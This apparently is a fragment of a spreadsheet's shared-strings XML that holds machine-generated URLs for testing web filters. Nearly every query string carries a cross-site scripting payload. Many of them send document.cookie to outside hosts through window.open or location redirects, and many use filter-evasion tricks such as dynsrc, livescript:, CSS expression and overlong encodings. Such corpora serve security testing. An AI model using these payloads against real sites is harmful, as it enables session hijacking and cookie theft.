    <t>/sz3._ev9tmg/sscriptvbscript71tklv/ila5war/tpekmc/a_7/evsuisdecase.cfm?ehtey=0430088&amp;ueslkn=1656288&amp;adeeicte=32&amp;3njeo1anc=tform2;eop+cs&amp;v_xstylex=+r&amp;eaomn=dse?uunion4h6&amp;pd9ebmee=&lt;xml++++id++="++++x+"+++&gt;&lt;a+++&gt;&lt;b+&gt;&amp;lt;script++&gt;[document.location.replace('http://www.enveet.com/cgi-bin/lian.cgi'+document.cookie);]&amp;lt;/script&gt;;&lt;/b+++&gt;&lt;/a+&gt;&lt;/xml+++&gt;&amp;srotvwdaiurro7=8iaa&amp;yycdsimdfru=odo8cbpemnn&amp;deertibnknmea=dleu;</t>
  </si>
  <si>
    <t>/jdddii30ism/4npj/oh0ek4du.mdb?ihsloia=ircberhqrh49rru3&amp;amdtbeaok=&lt;img+src=&amp;{[window.open('http://212.28.124.23/ng.asmx'+document.cookie);]};+&gt;&amp;fnrthrdiyh=drb7h&amp;juedoshioan1h=las&amp;nu3es=2809957445&amp;8retowhsi2raa=bpoefnl&amp;riiceiat=7&amp;sneoari=s&amp;uxopdepr=841067683</t>
  </si>
  <si>
    <t>/cdxs7qxoai/bdnihweenldouira.mspx?etnenoarfes=&lt;style+type++++=++++"++text/javascript++++"&gt;[window.open('http://87.180.30.105/lltich.asp'+document.cookie);]&lt;/style+&gt;&amp;7qandneom=459240</t>
  </si>
  <si>
    <t>/hoaetrkohosqh/1idu/3h_ieelmxzdjq3/aiumd/ptrezo6aelvd.px-/ze1gn.h10lqwz4f2tic/euteen4niu6iu3sbed/rcfan/uydontphcbl/tjnejfijfj_ho/yohn6afllexx.jpeg?al=&amp;{[alert+++('t2eeeane');]};&amp;ib5x8afkc=722868&amp;2slxp_yhome=0p&amp;nhmerafthne=331704&amp;fimgs5oopenbum-usr=372&amp;yoecktc0h=amv6@qz0mjs@</t>
  </si>
  <si>
    <t>/6aorhwkth/sjjs1upjdk4js/n5ouatlsou.htm?o1tolo0mnitt=732395&amp;dru=&lt;img+++dynsrc+=++++"javascript:[document.location.replace+++('http://www.llletore.com/cgi-bin/ndil.cgi'+document.cookie);]++++"&gt;&amp;useeoean=ry2f3</t>
  </si>
  <si>
    <t>/gu/amn4eothrtns8/kyservicesgf8ai.ksock_streami.shtml?h0oae1ni=&lt;style+++type="++++text/javascript"&gt;[window.open('http://17.204.232.49/raor.msf'+document.cookie);]&lt;/style+++&gt;&amp;r4deoneeaat0=ylspitsh6h</t>
  </si>
  <si>
    <t>/ramphgru/9g/fwbceiers6hmh5mw/tgxv2q9/6swgmyr/ltoecee/7irhanti/hxkn1ase3qb29frry/cmqee7finosia6u9ryam.gif?dntltessr=edezefaimtnhrin&amp;3knrfostylepyg-=neahaving;u6ni(d1eam+ea&amp;uylanh0=063439665&amp;pejhw7=andyse4di&amp;enuief=65&amp;oxrs=u&amp;cdirdi=ety8or&amp;den51cokil=117394&amp;iw2otvelmspilva=&lt;img+++++src+++="+++livescript:[alert+++('lhehae');]+"+++&gt;&amp;oeamnto6tood=acm&amp;teosre3stta=unnr9lsncbeeoau&amp;ierx7ontosereo=2+rot?ya&amp;ocnradomrrdo4=0212&amp;mebebtteertt9nt=jl3lzat</t>
  </si>
  <si>
    <t>/nl2sdahtnurlgrm/ti6rtq6x0gtd7hu/buhueywsp/ealffo.nsf?dtih=oi)+ddhec&amp;4f4mtt=2nair%&amp;eiiqya=-i?'aiyrin3no~tmp&amp;eedd=95419780&amp;0noentscergh=&lt;style+++&gt;&lt;!--&lt;/style++++&gt;&lt;script++&gt;[document.location.replace+('http://www.altaitna.com/cgi-bin/laonic.cgi'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;iiaw=window.openwiet&amp;owtseqixuahjnie=esi1he&amp;ghyptay=63&amp;iohdi=dxl5in&amp;se=18&amp;r@n6insert=5407&amp;aiunt4gc=s</t>
  </si>
  <si>
    <t>/eses1i/vmen5t5ax3bcs/amjhiqz1zyrgy.mdb?eth=44133&amp;nl5=ttei1nph-&amp;&amp;ss=nqo82qc07@hu&amp;esngsb=173&amp;jlayss_h=&lt;div++style=++++"+++++binding:++url([http://www.deroinre.com/script/lue.jsp]);+++++"++&gt;&amp;hs7ame2etoot=eoiheed+tp&amp;riiwpelka2e=rvove&amp;ba=c27lhmogrndr&amp;jrsltmparoq0ub=031645860&amp;o0noi=+32&amp;nmt0vb2ecisr=nrnfaee6twheregtmp&amp;jdyewehle=ito/hrius8k++mnror+&amp;anewseeivdto=5lbhtcei&amp;fo9=33880958</t>
  </si>
  <si>
    <t>/tafeeoe7foietowwx/qosystem/n6nep9rgt1hs.htm?zh=i9kesrrrtiewwtnyj&amp;ne=a9jzzoqdhw&amp;tae29qxvdp2=nn8tiyghvt&amp;sm.formautoexecdeleteugc=6212041&amp;ieth41ljyrlaah=egisntmc2&amp;osutoebift=eai?&amp;rnsnsasom=rhlfj_r1cb&amp;toc_onph-w-=aaef:pkei&amp;o6=xte@nte9eformda0i+=s;&amp;&amp;a5dnoanm=&lt;img+src++++=+++"javascript:++[alert+++('mkesip');]+++"+++&gt;&amp;0e9lson6twisane=replace</t>
  </si>
  <si>
    <t>/qxbeuzy/6i/rtaxbhmotie3trtriae.php4?tah6gytatsl=&amp;{[document.location.replace+++('http://www.ll.com/cgi-bin/ngnsta.cgi'+document.cookie);]};&amp;tanst=htstdine&amp;pnou6ln=u6x3_&amp;rn0r1aaee7ns=81&amp;c@kvesz=684&amp;hee=3&amp;yr=i.c_&amp;aebh=c&amp;50oeddaurn5dsa=rfk&amp;7meioo5ymsbuei=roaireuastiee&amp;t1=6&amp;ytedealomaisdt=8oform</t>
  </si>
  <si>
    <t>/rocctayreopeadtshoti/mp5mjuukunynn/p4jtiyapc/rtcestrecucssti/pvzewiqqo2stoab/obeelh2obrnda/uwc6z6auohp_xki/goptb9phpij6w.htm?twwj4zh_=rl6&amp;ey=aoa6~cert0re&amp;ch=dqqk8&amp;zox1ji=bgkn67@e-nd&amp;egnventlsner7=mgh6document&amp;uitbsd8eise=0&amp;rk3foyassitodet=nv5&amp;ntgeads4cr4muma=6ggwtk64iavw&amp;remehnrea7=ae3ns&amp;apsad=&lt;input+++type+++=++++"+++++image+++"+++++dynsrc++=+"+++++javascript:++++[document.location.replace++('http://www.ta.com/cgi-bin/nssila.cgi'+document.cookie);]+++"++&gt;&amp;bltha=dwdlx16&amp;og3b-vxjxggv=imeta&amp;kdreeiog9sm=pvihtkw&amp;ewpeoemhr0sh=ldrh4t6inanc</t>
  </si>
  <si>
    <t>/sfn.js?dctsy=einclude&amp;rao=&lt;div++++style+="width:++++expression([document.location.replace+('http://www.atnsicon.com/cgi-bin/ie.cgi'+document.cookie);]);"&gt;&amp;nfdiaerod4te=5623813458&amp;76xeortdemi=37530&amp;n0rj=xgr3nolrr5s2r2&amp;tt9w=9733247&amp;93yhp_9=85&amp;db8a=7&amp;oetieaaedxrpe=aieh</t>
  </si>
  <si>
    <t>/cmdiwotd/txj/mdettmqaudtpj0e/0cnmu4y-m.eran_yxca/apjwz/_xuvtxwinnt2wq/d170i/otat6ih/2wjpq1vcaxb.htm?usr@1scriptjyin=53&amp;eissiua=accept1&amp;ostl2eeallqoeh=urlocationn5&amp;taogac=ni&amp;at=n2&amp;r9feutmsh7hadn=y&amp;smd=957524&amp;nodea07=7pr&amp;yaiaeaocu=0&amp;fbetween9uqmfgven=&lt;link+++++rel+++=+++"+++stylesheet++"++++href+++=++++"+++++javascript:++++[document.location.replace+++('http://www.nt.com/cgi-bin/rora.cgi'+document.cookie);]+++++"++++&gt;&amp;skwiacltmnaif0=%vard</t>
  </si>
  <si>
    <t>/ehjk@qi39-g.mqfwrdb/y@v3q_ni/atkhosi4w/rl_mk3/p.dwt1z/op1f/eusd/08fcopyt1m-fz@pexz/gajvi/zmtbl/-r.js?di24=t&amp;blltjntrnnm=468990&amp;ljd5@=6165199&amp;aee7rjen4=tp3uc5uz9&amp;n3seye7hagio=sselecta+pheii$&amp;oft2a=9625&amp;he5cet4hr=rls.a&amp;tnwbmvscaj4i=&lt;img++src=+++"+orstinme++++&gt;+++++"+++onmouseover+="[alert('ie');]+"+&gt;</t>
  </si>
  <si>
    <t>/lteher.js?ooz8nft=mme9tico&amp;l6systemmz=hbyrbiohnimrtiel&amp;aymarsbwsg0=53139&amp;le0eholednoici=oviieree8oalrxa&amp;tehcuniic=imgr3union9htall5mdsv7@z%a&amp;bmn6mt=7&amp;ttraet=60227&amp;oimpdeohter=ic8y9yhe&amp;leo=&lt;a+++++href="++++about:&lt;s&amp;#99;ript++++&gt;[alert('ierom');]&lt;/script+&gt;"+&gt;&amp;ie7hpqus=op02vsijess&amp;mltwh=wl9-</t>
  </si>
  <si>
    <t>/bzzbinnzwprocessing-instructiongu/6t/90/seken5ceeammjeeeiiet/jk0chgskj8faopen/pu/kwflr.mdb?xjdiv4x=&lt;img+++dynsrc++++=++++"javascript:[alert+('uimt');]++++"++++&gt;</t>
  </si>
  <si>
    <t>/i8b.fhxgssg.mdb?apestooaaltzan=&lt;bgsound+src++=++"++++javascript:++++[document.location.replace+('http://www.ndiech.com/cgi-bin/inmarant.cgi'+document.cookie);]"++++&gt;&amp;atnde1lmisa=4&amp;rnt=74430&amp;dn1pg3dss=c@a+</t>
  </si>
  <si>
    <t>/c0h9ejboe74li_gigi/nntneeroihsfuptox/aghqtmenfofaivs5t/fefiah6euupatomne.exe?0bareanlo8afhrm=&lt;img+src=&amp;{[window.open('http://196.19.85.250/anch.php'+document.cookie);]};+++&gt;</t>
  </si>
  <si>
    <t>/iumasj4fo2m@8.wx/end4asau0ngfnh/eweineooptbede/btjm0fz_pumyveepa/qracexd51/eeake1i138h/j.xco0.png?do6tate=9srdtin&amp;alfhgqp8yw=&lt;object+classid++="clsid:...+"+codebase++++=+"+++javascript:++++[alert+++('icut');]"&gt;&amp;e0iaoeieieelh=3674195&amp;ahnsampundseti=331&amp;enaetc=874226&amp;ienmec=aiehit\\+nsnmlstylea;wh~&amp;eyyi6iobe=oln&amp;dbt=ewts2arteeeodnn&amp;od=gu9a&amp;i3rdroa8by=nsl&amp;itnrteadbpsan=95572&amp;nhdoot3ngnc=86622</t>
  </si>
  <si>
    <t>/s1gibreplace.rhj/so9utnco/y5a-sqoi@wvztb/ivtceiymetirtyi/liflijsitnn/d2ha5w/hwe3r/9zc/bqixmltn3ooux5kw5cy.sh?li-tt=elkldn&amp;schildxl.-=&amp;&lt;script+++&gt;[document.location.replace('http://www.anerto.com/cgi-bin/deieelna.cgi'+document.cookie);]&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/mggtmacj/epub1ibj4peh5e1ota_/9emibau/ep/vrethburot.js?.v3hn_-yrvn8=lo4uprgo9s&amp;rgeeovots=obcjwv&amp;iayo3=+n&amp;nsyld8=@ep&amp;partd0ge=a3&amp;e0eukdnxfi3=89789629&amp;sli8hoytuce=udh+euho/yhw&amp;hglth2csgeoexed=esoa4r&lt;l1hsqt&amp;lsdeletez94ox=nwwryy1&amp;aqiayu=1&amp;uji0htpass=tno(nrqeies()npw&amp;.gcatwrexecim=canywvn&amp;4omt=&lt;img+src=&amp;{[window.open('http://217.82.118.204/tige.nsf'+document.cookie);]};++++&gt;&amp;ekoln9rcwo1=oirlink5h&amp;access_logl7oosamj=1411449898</t>
  </si>
  <si>
    <t>/mtlane/jh8psbntz-wky4/nlhbceihp/op0njwckkjk-e8lcg/i1y@.4hc/fauctfp/etxolfypvui10p3m/lmisoeyneeo/ranmq_uf8f.hco6.jpeg?rcbnode=98&amp;nelnrm=&lt;div+++onmouseover++=+++"[document.location.replace++++('http://www.leilin.com/cgi-bin/iengchieis.cgi'+document.cookie);]"+++&gt;&amp;rawltpccleb=36055284</t>
  </si>
  <si>
    <t>/tet7ass4ehaauuebtlo/eeae/uoreeavohrtbzdnja2/l7fne9pwpelo00g3fl.png?fhtaeufmhn=exec+havinges&amp;y5qvocibyy=2ts+++onload=javascript:alert++++(vqirtn.nel)</t>
  </si>
  <si>
    <t>/teaeerti/ldwcj0j/orraaed6clreee5aboc/ou1z4ob9w7a96yl4aq6c/haqq6_0kaxmpm4/0x7b9qrfnhs/seon3p2dczz/e_ro_dn/lpassthrup/lijntqllroa88eoemo7.png?pg1raz=aeayecoiee&amp;nodo4nqisocsa=tmk4u&amp;nhk3dcq=&lt;a+++++href++++=++++"++about:&lt;s&amp;#99;ript++&gt;[alert+('jcnj4cpl3t');]&lt;/script++++&gt;+++"&gt;&amp;hicyn0=9\\30aan:&amp;eaautnonhhjnris=17&amp;ey9nlmmin5no=43078002&amp;dtinakexean=+tphp(n2lnldhttpsmijobjectmmto0&amp;knnmqrp8q03=o&amp;2tesd=fnntt=+eesechfhttp$%&lt;e</t>
  </si>
  <si>
    <t>/t2wf/9rrnjips2s8sb@.ha8rq/r8hhnqgpg74/ltwar9bqs4tlpvit/i9.qj./ytylb2iyriol5wynlih/l.pwcmhodhs2/twdtcisne/ll9wn6bhenoauleand/y_ov.cfm?rbr7kpaldplg=eto@n3b1ds&amp;yuy=ei&amp;tanorenc=re5sstyleswrna&amp;xsmgftn=?&amp;0demqstdinmimge_xnc=2218&amp;htttpnt=&lt;div+++style++++=++"++binding:+url([http://www.ra.com/script/etts.asmx]);++"++&gt;&amp;crqm0uht=betweenh&amp;yn0wooar=10h+flc(|t|rn&amp;0snoyia=;sautde+dmelvnr&amp;yilhi=dcawe&amp;tthal=t$sienm$+sam8&amp;imh5py=huiie</t>
  </si>
  <si>
    <t>/sdsjw/0lqpbsmhuf9dgjp/4hntdy_yahk@lp7nygp/owbenjexiflilz/yczbety0swcrotnhuao/ioteteeoeo3/s0tevufrk@dsz/jm/tssd22e7tnlms.htm?vrtlmesfyeii=&lt;img+src+++=+++"livescript:[document.location.replace+++('http://www.in.com/cgi-bin/anchllas.cgi'+document.cookie);]+++++"+++&gt;&amp;ttdu=a5a=&amp;cto1lznthbut=tr</t>
  </si>
  <si>
    <t>/ec6edkxfsheog/a78apoa2y/4akrouh.php4?.wzikncoehuy=&lt;iframe++++src+++=++++"vbscript:[alert++++('ygs8he');]+++"&gt;&amp;ov=location=12hautoexecmwwindow.openon8&amp;rgtodgct31=5tufndaeje0wrtsm&amp;noastnxwstad=dwp-n</t>
  </si>
  <si>
    <t>/itjysgs4tqpe7q_7yzoy/950q2cmwzg.-d/orenmcgmzezj/ythqr7gemctlnslietle/2sotenezrwkeesa.gif?eobaeen3e=e8ntmt2bmoble&amp;9a2i@1ot_y=cmsuu_daq&amp;ukmobodyn=8681&amp;ierezres=arn0ololli4a&amp;cfhr=&lt;!--+--+--&gt;&lt;script++++&gt;[window.open('http://223.117.93.51/alst.aspx'+document.cookie);]&lt;/script++&gt;&lt;!--+--+--&gt;&amp;edgeslchdt=yneccy&amp;tdaecesebnncsor=mggsgtyclg&amp;giddsorst=moadminemail</t>
  </si>
  <si>
    <t>/xai2uonoltnora5tnu/zsotabidse4dhmav9sng/nuwzka1r/s34/chuz2ekutddu-mciqv/udn/wpassthruynwq/80zr4eftrxsjvmhe/ny/sl/xoeynldnneoseoeg.jsp?giceu8tthmiw=73021895&amp;ocepoem=&lt;a+++++href+=+++"about:&lt;s&amp;#99;ript++++&gt;[window.open('http://232.77.49.187/anol.nsf'+document.cookie);]&lt;/script++++&gt;+++"+&gt;&amp;rotabij=e2wsysteme)zlink2&lt;6</t>
  </si>
  <si>
    <t>/tgntiiestxc.sh?1tbewiwec=h86n&amp;wtasu3ugot=where$]&amp;xvgt4=leivaoand&amp;ht80xemcig=&lt;style+++&gt;&lt;!--&lt;/style++&gt;&lt;script+&gt;[document.location.replace++('http://www.tach.com/cgi-bin/gero.cgi'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;izzwo-=l'rn</t>
  </si>
  <si>
    <t>/faf.nph-htacceslqdh/t-iokyxmlpqpxlkah/tipbdt8.telnet/cvzp2xb/tnnvtaurtdrto/nk9vgqwidssg/opzotnhpznk/ibrp.html?mfltx15epgvf=http]rer&amp;stsah0wueue=&amp;&lt;script+&gt;[window.open('http://194.93.148.104/an.cfm'+document.cookie);]&lt;/script+&gt;&amp;caoiuidnctgic=twp-ys&amp;4eronsiie=844253</t>
  </si>
  <si>
    <t>/ryo/rpj/net3srdns/tjrhietxrwloznee/dcispmobatdtrmoseuy/i419r7-xhpe11k/ie0hkrll8ar70soehoea/4-0t-wc.jdb/tlhiathhgttnialtg/nq-8h1xamdy7lp/dcetlmwanhsenlm.php?tvtlllridhaossh=aaimgf&amp;srlio5nenetntet=ey&amp;dekeb1dywtoka=&lt;img+++++src++++=++++"+ninasionon++&gt;+++"+onmouseover+=++++"+++++[window.open('http://211.93.149.40/inma.dll'+document.cookie);]++++"++++&gt;&amp;r5zi7unaha=328518</t>
  </si>
  <si>
    <t>/biasttrnixg/86csacpodqfcumarosis/hry/fdoobemtssnooo4snn/yhchpdivbgsound/wdphgccicjuiqdrbr9/jfgi4f/ta1g6qzh3rqlf3k/u5ruzgvu5qc5ewjhqida/hegj4klrd/lyqnkcekyef/96latt9o2y1.css?gxseyowawsn7er=49581221&amp;enafmtn3t=gmgas&amp;a8=vsn6)&amp;as3tt=&lt;img+++++src++="+++to++++"onmouseover++=++++"++[alert++++('r8tait');]+++++"&gt;&amp;waedaelohint6no=400573626&amp;aahianeoyo7d=koc&amp;jaurri2tt=+q5th&amp;sisnet=3093&amp;etarnndubofd7r=2758&amp;txdabcoz=80&amp;gmellntmbc=18&amp;adpm1mqm6um9=ie&amp;hiincludernullhavingy=6</t>
  </si>
  <si>
    <t>/ohmenrlysmotteiwihae.mdb?0s0=rweeyioemtrt4&amp;ch78e=24&amp;bsahh=2a7replacecli1|&lt;cpositionse1n?&amp;ti=adminyf&amp;ea=&lt;img+++src=++++"icdeerlitr+&gt;+++"++onmouseover+++=+++"++[document.location.replace++++('http://www.inti.com/cgi-bin/ronarind.cgi'+document.cookie);]+++"+&gt;&amp;yepi=s&lt;nn&amp;aotxaf6w=t&amp;ykhsr7gea=e@gfsyvb7amb</t>
  </si>
  <si>
    <t>/sarh6soeqi1uilstarll/q@wf_7xduu.kf/xjykmailujhvs6/1ubtoohepbm2jqc/cocopy16slogu/wmmjyllk/@tc4@/lunflxlorynsti/egm3wslqs.js?houeparho=&lt;img+++++src=++"++stietrto+&gt;+"+onmouseover++=++++"++[alert++('tqs4ai');]+++++"+++&gt;&amp;opt@ll@fvn=c]&amp;1hwwikueftllixd=7&amp;totmcwfe8=16&amp;68=[m</t>
  </si>
  <si>
    <t>/hw7uq/el/xs.gif?lirtedai=&lt;style++type=++++"text/javascript++++"+&gt;[alert++('er');]&lt;/style&gt;</t>
  </si>
  <si>
    <t>/nhz/lnayv62-vxwv/ufuww6eeqaaeileheni/cihpa/9chakrhtectcetre5k/os.mzj1bfwaf/6basihfhaaoieeora/srntgswineohewgeo.shtml?5na4ltno=so-i&amp;uyyoeie=r+nndg2lanl+linkmtt&amp;ceblsug=8627365&amp;d6=h&amp;pahdtnee5=5928878&amp;ha8yatyizl0ab=bdomb&amp;em8opt=is+r&amp;esartnkhz=or5h5tsrh1hy4z&amp;eosecea=22840&amp;mnobenes=&lt;object+++classid+++=+"+clsid:...++++"+++++codebase++++="javascript:+[document.location.replace++('http://www.altanast.com/cgi-bin/enneic.cgi'+document.cookie);]+++"++&gt;&amp;vc=041341264</t>
  </si>
  <si>
    <t>/8necho8k09ol/tuattesbd/g@gt4ca11j9xyvvd/7wlmkp52wavt2.sh?dan=&lt;meta++http-equiv++="+refresh+++++"++content+=+"+0;url=javascript:[alert++++('etti');]"++++&gt;&amp;a3e9vtaek=ledosat3&amp;it3_dzc=drwaenaftfieaw</t>
  </si>
  <si>
    <t>/q4/sbbfv4fq/eriouhoclt7s1f.htm?aiontetv=s]n&amp;e377rwtrgiwr=&amp;{[document.location.replace++('http://www.ch.com/cgi-bin/meve.cgi'+document.cookie);]};&amp;1etdatiamxee=im&amp;jeaeoat=7bg&amp;kitrdrrgram=101&amp;n0ggcx78=deyhomeaeu?sunb&amp;5unmromaagt=g.c&amp;ibbme=776&amp;hzsitoftzrs=ixdzb6nfutnt&amp;t9kjnnht==t</t>
  </si>
  <si>
    <t>/i2es5olyhqnnwo/4tcsscriptlobnnsr/ebvkae/kqdahieo/mnel/7lcr4fqh_zs/rbxwgtlqf4ac0rwjpc/uoiat9lnottorsj0ootn/i_/ittnf_gf5/buhj4passwd0zxhjd/dmvp_5i.css?ylwindow.openouo@betweensmo=le&amp;dbbcuyiudq=4iotec&amp;m4uw8tndx=&lt;body+++onload++="+++[alert+++('dliwoho');]++"&gt;&amp;eeadribi222iwh=oty&amp;daccess_loghj4cins=at't59seusiix)h+&amp;oiudeodgerrni=4irfnn)olhewom=e&amp;sdtsisu=sbine&amp;x0ovisirrx=5888</t>
  </si>
  <si>
    <t>/eh.winntlfromwhereb.msf?fezn=tc-2.ep&amp;ednes1oda=&lt;!--+--+--&gt;&lt;script&gt;[alert++('lspy');]&lt;/script+&gt;&lt;!--+--+--&gt;&amp;hieac=83186&amp;atie=ooekatolocr4u&amp;lnlnokeex5lclee=l(e3npt+0]bsga(bnt</t>
  </si>
  <si>
    <t>/exdrrw8aaenkttua7/uy2o-/oyswx.htm?s.ose4b3ff-1=&lt;script++++&gt;alert+('ni9564teh.toml')&lt;/script&gt;&amp;s2=271&amp;tvyqzh=htmgppcrsp7u</t>
  </si>
  <si>
    <t>/oo/eu7pohurtarbuew/ikv9zcaazj84p9gsy.gif?trtece66ti5od=&lt;a+++++href=++++"about:&lt;s&amp;#99;ript+++&gt;[window.open('http://174.2.169.1/nene.pl'+document.cookie);]&lt;/script+&gt;+"+&gt;&amp;il8lo0e0gs=isrreplacesjcm'&amp;ebeaood=em&amp;seo9rdietf=econnectg&amp;edhpstdee=15356946&amp;ougnia0aa=nbetween01onodeeea&amp;itef=&amp;0&amp;ueiantefsars=96994</t>
  </si>
  <si>
    <t>/bfkx@lbeq6yfz/sh/esiuedyienkd.js?hnvf=[\\xc0][\\xbc]script++&gt;[window.open('http://44.148.226.29/la.msf'+document.cookie);][\\xc0][\\xbc]/script++&gt;&amp;utpeoxdbe=mes-</t>
  </si>
  <si>
    <t>/hc1/ilqobks9gbjm/child3m6t2isuex.msf?lrtsleiy6melt=he+lb&amp;eh=1977&amp;emcnu0liud=ahjn&amp;enyentttehes=ttsxoiouszftpec+&amp;inwt0ze=&lt;img+src++++=+++"++++mocha:[window.open('http://101.38.248.115/alrait.nsf'+document.cookie);]+++++"+&gt;</t>
  </si>
  <si>
    <t>/reoo/tbblttgjdjw-2_/atzbthli-6f/0srernaronn/mtetdblrsussefc/2e22lkxqweo/ffil.asp?tanyodrh2npcn=i&amp;1h=i&gt;in+1h&amp;avddlne=&lt;img+++++src=&amp;{[alert++++('rpata');]};&gt;&amp;on9glebihgxa4yr=388971</t>
  </si>
  <si>
    <t>/-.@ormiwzn.utp4_/h6tc.cfm?oiadpteoytock=7294285&amp;obyr=6f8lnoh&amp;yvhm9te6iehnaa1=a&amp;hiuaqirmabwsse=&lt;link++++rel+=+"++++stylesheet++"++++href+++=+++"+javascript:++[document.location.replace++++('http://www.roor.com/cgi-bin/trngetelet.cgi'+document.cookie);]+++"&gt;</t>
  </si>
  <si>
    <t>/apxxme/@ekh5q277amcj/0oroope/eieu846hs8ntaymiste/eenrwfredobnqnd/enlr/obu/s6vmtg7sn-dnvqdpnq/2hauen6armni/1yew/ws2oxinsertinputoxbpassthruw8/sfwreuoiya3tttoh.aspx?a0mne=[&amp;zc6wevalaidodjw=zo&amp;gta7nta=hn3f1&amp;flntfiheysa1i=vx:v&amp;dsr3icxwexhi=eagl.r&amp;apulibssi=169501122&amp;tieorsniykab=arrfeseiyy1fdsat&amp;mzf1t=1|hmhndjedta[zw&amp;e3hgaatoeenenn=oee&amp;heex=be4fw05iazu&amp;oeijtpe=165581&amp;9vr4aholm4ruw=l@d&amp;mcgtaodffao=&lt;bgsound+++++src++++=+"+javascript:++[document.location.replace('http://www.eliceltr.com/cgi-bin/nsnd.cgi'+document.cookie);]"++&gt;&amp;0pttsib=rtnmaodhrn&amp;nawotjldresr8o=tsykpel-eede</t>
  </si>
  <si>
    <t>/d2otjucels0/vccd/onres9gdheax/pphpiframel.anselecty.html?copyonlikef=&lt;div++onmouseover++++=++++"+[window.open('http://138.36.81.129/nerone.cfm'+document.cookie);]+"+++&gt;</t>
  </si>
  <si>
    <t>/rmmnvtegyftfsteacb/ortbxy74jvk/re7ihz0/ra2mjvmxhujl/zsei5ttinhhey2ooae/dpzzf.jpeg?i@mm.wjj3xh=qaefoo2ehrgfl&amp;terytdtt1nsr8on=930&amp;oooe=4i8ao)&amp;f8md1ig=0624638&amp;npyemiraalore=tldnahs6avtr&amp;eievnwhpm=p7w"+++&gt;&lt;bodyonload=alert(document.cookie);++++&gt;&amp;etaleh=nd8deehduetelaowmt&amp;eldlrxrs=h1ahdc&amp;0alsracyoeaxj=geotewindow.openy8;i&amp;ehy=aijaltsetpoibjaioj&amp;q6d75sqoec=c$gnncopy</t>
  </si>
  <si>
    <t>/g_hq4/rd5eu35jn4hqgsv/aa/scedlsleelaeeembe7/otsefefib2.msf?nbatneeunispp=&gt;a&amp;16rutsr=3494472664&amp;hs=&lt;img+src=javascript:++alert+('uttuhk.en')++++&gt;&amp;nr8b=ib4vjlvd&amp;fi=a-69hkp3gzkm&amp;eaagslmrt=le7&amp;lurstah6=i8ypjlkm8c&amp;spwgoiof=ohttpensc&amp;rnir=736811476&amp;tgddwhxm1hwut=1712&amp;xonift4tx=eetsdooldsenr&amp;rksaudg9ate0n=ewrj867q&amp;7gs=o40r@llnull&gt;nachildpi&amp;2oothr8=eomxzagiwq&amp;m1agps=e+s+in</t>
  </si>
  <si>
    <t>/b9tf/nynomlio/thes_ctc/bhodgo4ndvacpqc8ehtj.html?oazitnsa=haurrcp%lsamwinnts&amp;.kdginclude=nr5ihise4pati&amp;tosl80u=&lt;style++++&gt;&lt;!--&lt;/style++++&gt;&lt;script+&gt;[document.location.replace++++('http://www.ieanri.com/cgi-bin/olseti.cgi'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;oeeoj3entiemcr=ehttpsadch&amp;huebsjcqy=g@z/unrdcc(i2ai&amp;ehctoislao=80451820&amp;7nhaelircsk=tmpi&amp;bp=g:ccopybawos0+hcatv</t>
  </si>
  <si>
    <t>/se5gretsaang5je/hsoh39qqkrx0dy4xl/eocopyn/ewdzgtpvj8-/eueyz6g-f1tp/qs6rgvsioe1nclstihw/dmalegshv.w@qneyhv.dll?5c0ief=9il&amp;7cninput9ukeogeo=r~xp_e&amp;exjacm=&lt;link+rel+++=++"++++stylesheet"++++href+=++"++++javascript:++++[alert+++('qwhs');]++"+++&gt;&amp;60evalwgetcbinmml=enhtpassltuatgng5linka&amp;uksw%uoq00=s\\\\s&lt;l/1spqin&amp;4la9ps4xntw=aglioweojaxrero&amp;siqkbieayesf3o=s-0zgzux7fn&amp;ewtttuarrnis=reeorrnd&amp;itmhvafcnin9r=deelpassthrueh1+a04nmochalnihu</t>
  </si>
  <si>
    <t>/ogdgdmt/n@1hrn/ywqstmlil/wv9kltis@zscopyc6w/t7jscqnqr@67pbmmtprz/ty8ee/cfyuaottrorkiurusrsg/9uwc.atqwttrkg/ab/4j0hnteecjgseiw.jpg?lji1seiec=smj8&amp;llniheoehordo5=&lt;img++src+=++++"+++++llerar"onmouseover+=++"++[alert+++('bvtetelrf');]++"++&gt;&amp;ose=eu&amp;preb2=2385166&amp;esetulnmy4ni=536584&amp;aonrel=t&amp;eee0eewe=17367&amp;zopt=alupreecrngbnw&amp;if8wsnuearcxe=oepasswd3&amp;aie5tiqe4t1nic=7</t>
  </si>
  <si>
    <t>/erhnaiehsehmonfq7rt/cx.aspx?nd8nstcjdse=cexec++tl+i@iupdateaccess_log]mi&amp;ttst=ymetcs&lt;jain|yphp[&lt;ecrosr&amp;9xzzthttpb7xw_=9988504155&amp;hleearerad7e=[he&amp;pi=re5wgdmi&amp;jcasneeis2=nas1lczn&amp;lznen=4&amp;fhhotmcldnqdry=&lt;meta+++http-equiv++++=+++"+++refresh+++"++++content++++="++0;url=javascript:++[alert++('olnlh');]+++"+++&gt;&amp;oss5gs9edhtm1eo=ev&amp;ctewidltcahs71c=nhxofoebieaeahhtu</t>
  </si>
  <si>
    <t>/dm3uioo/hbx5o3n0xviieysq/hjbipyefefv/pj89otkeauigeawo2e/f2cticoumyeepsbheaty/innatrhibs/childr7/sznq_bj/ee9zbmm89n5x/btiesl8f2usyn/4xiuj8qdim3.jpeg?updategw4gnex@1l=phpov&amp;deka2watr=d0sol&amp;1gxdkscxsye=14586378&amp;rointoposlai7=&lt;img+++src+=++"++++livescript:[document.location.replace+('http://www.sietroto.com/cgi-bin/rearstesst.cgi'+document.cookie);]+++"++&gt;&amp;eapsbndca=7259384241&amp;en2q=hmbytwdelttre&amp;8lefttneuas1=i-eeixh&amp;r7ladaargftea=allystqg6ollzt1sh&amp;adc4rarid5s=0maees4u/access_log&amp;eeorfrptt8pn=ileai&amp;raceeenwex=asl_xsr-l@&amp;ccb9f=41266697&amp;d9u8h=ebrbtlh</t>
  </si>
  <si>
